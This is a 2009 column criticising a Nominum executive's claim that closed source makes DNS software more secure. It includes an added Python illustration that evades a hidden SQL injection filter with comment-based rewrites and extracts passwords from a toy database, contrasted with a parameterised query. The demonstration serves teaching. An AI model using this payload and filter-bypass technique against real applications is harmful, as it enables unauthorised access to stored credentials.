Secrecy Is A Stupid Way To Sell Software Security - InformationWeek


Commentary
9/24/2009 03:48 PM


It makes my day when someone out to "expose" the flaws in open-source software ends up doing exactly the opposite.

In a recent ZDNet interview, an executive with a company called Nominum tried to make a case for using his company's hosted DNS solution. Nominum's technology, which is intended to replace the ubiquitous, open-source Berkeley Internet Name Domain (BIND) software, isn't of interest to most bMIghty readers.

Nominum executive Jon Shalowitz's attempt to explain what's "wrong" with BIND, however, is absolutely priceless.

I'll skip over Shalowitz's muddled claim that "open source" equals "freeware" -- a whopper that he follows with a disingenuous attempt to associate "freeware" with "malware." The real fun starts later in the interview, when he explains why Nominum is so much more secure than BIND or other open-source applications:

Number one is in terms of security controls. If I have a secret way of blocking a hacker from attacking my software, if it's freeware or open source, the hacker can look at the code.

By virtue of something being open source, it has to be open to everybody to look into. I can't keep secrets in there. But if I have a commercial-grade software product, then all of that is closed off, and so things are not visible to the hacker.

By its very nature, something that is freeware or open source [is open]. There are vendors that take a freeware product and make a slight variant of it, but they are never going to be ever able to change every component to lock it down.

Nominum software was written 100 percent from the ground up, and by having software with source code that is not open for everybody to look at, it is inherently more secure.

A quick trip to Netcraft reveals that Nominum's IT staff apparently didn't get the memo about avoiding software that "everybody" can "look into": The company runs an Apache Web server on Red Hat Linux. And a subsequent claim that "Nominum has never had a single known vulnerability in its software" is simply a lie: As one of Nominum's own security advisories points out, the company's products were affected last year by a serious DNS cache-poisoning vulnerability.

But the ultimate take-away lesson from this propaganda exercise is Shalowitz's claim that security through obscurity is a more effective way to build software.

It isn't. Shalowitz himself explains why at the end of the interview:

You really do need to look under the hood and kick the tyres. Maybe it's a Ferrari on the outside, but it could be an Austin Maxi on the inside. The software being run and the network itself are very critical. And that's one point the customer really needs to be wary of.

Thanks, Jon, I couldn't have said it better myself.

Decades of security exploits, hacker attacks and malware variants prove that trying to secure software by keeping the source code a secret is a fool's game. Attackers have never needed the source: they disassemble the shipped binary, or simply probe the running system and watch how it responds. The only party that gains a "security" advantage from closed source code is the vendor providing the software; it has the luxury of deciding if and when to disclose a vulnerability and issue a fix.
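To make that concrete, here is an added illustration of the principle (it is not code from the article, from Nominum or from BIND). It models a "secret" request filter of exactly the kind Shalowitz describes: a hidden rule list that blocks injection attempts. The attacker never sees the rules and only observes accept/reject verdicts, yet recovers a working bypass by trying a handful of rewrites that the backend treats as equivalent. The names (obscure_filter, backend_view, find_bypass), the rule list, the sample table and the assumption that the gateway URL-decodes input and the database ignores inline comments are all constructed for this example. The parameterised query at the end is the contrast: its code is fully visible and the same payload does nothing, because its safety rests on design rather than on secrecy.

```python
import re
import sqlite3
import urllib.parse

# Constructed "closed source" rule list: the attacker is assumed never to see it.
SECRET_PATTERNS = [
    re.compile(r"union\s+select", re.IGNORECASE),
    re.compile(r"'\s*or\s+", re.IGNORECASE),
]


def obscure_filter(raw: str) -> bool:
    """Return True if the request is accepted.

    From the attacker's side this is a black box: only the verdict leaks.
    """
    return not any(p.search(raw) for p in SECRET_PATTERNS)


def backend_view(raw: str) -> str:
    """Model of what the database layer ends up executing (assumption for this
    example): the gateway URL-decodes the value, the SQL dialect treats /**/
    comments as whitespace, and keywords are case-insensitive."""
    s = urllib.parse.unquote(raw)
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def mutations(payload: str):
    """Cheap rewrites an attacker tries first; each keeps the backend meaning."""
    yield payload.upper()               # defeated by the case-insensitive rule
    yield payload.replace(" ", "/**/")  # comments instead of whitespace
    yield payload.replace(" ", "%20")   # URL-encoded spaces
    yield payload.replace(" ", "%0a")   # URL-encoded newlines


def find_bypass(filter_fn, payload: str):
    """Black-box attacker loop: needs no source, only the filter's verdicts.

    Returns the first rewrite the filter accepts that the backend still
    interprets identically to the original payload, or None.
    """
    target = backend_view(payload)
    for candidate in mutations(payload):
        if filter_fn(candidate) and backend_view(candidate) == target:
            return candidate
    return None


def lookup_user_concat(conn, name: str):
    """The code the 'secret' filter was protecting: string-built SQL."""
    sql = ("SELECT username FROM users WHERE username = '"
           + urllib.parse.unquote(name) + "'")
    return conn.execute(sql).fetchall()


def lookup_user(conn, name: str):
    """Parameterised query: publishing this code gives the attacker nothing,
    because the payload can only ever be compared as a literal string."""
    return conn.execute(
        "SELECT username FROM users WHERE username = ?", (name,)
    ).fetchall()


def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed sample rows.
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "pw1"), ("bob", "pw2")])
    payload = "x' UNION SELECT password FROM users --"
    bypass = find_bypass(obscure_filter, payload)
    return {
        "blocked_plain": not obscure_filter(payload),
        "bypass": bypass,
        # Filter accepted the rewrite, so the concatenated query runs it.
        "rows_via_concat": lookup_user_concat(conn, bypass),
        # Same accepted input, no filter at all, nothing leaks.
        "rows_via_parameters": lookup_user(conn, bypass),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The filter blocks the obvious payload, and its rules were never disclosed, but the second rewrite the attacker tries sails through and the concatenated query hands back every password. The lesson is the one the column draws: hiding the rule list bought nothing, because the attacker only ever needed the system's behaviour, while the parameterised query stays safe with its code in plain view.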

Sometimes, there are legitimate technical or business reasons to choose a closed-source, proprietary application. And in some cases, there might even be a reason to use one of Nominum's closed-source products. But when a software vendor tells you that its product is more secure because its closed source code is a "secret," it's time to find the exit. How can you trust a company like this to tell you the truth about its products when it can't seem to tell you the truth about anything else?
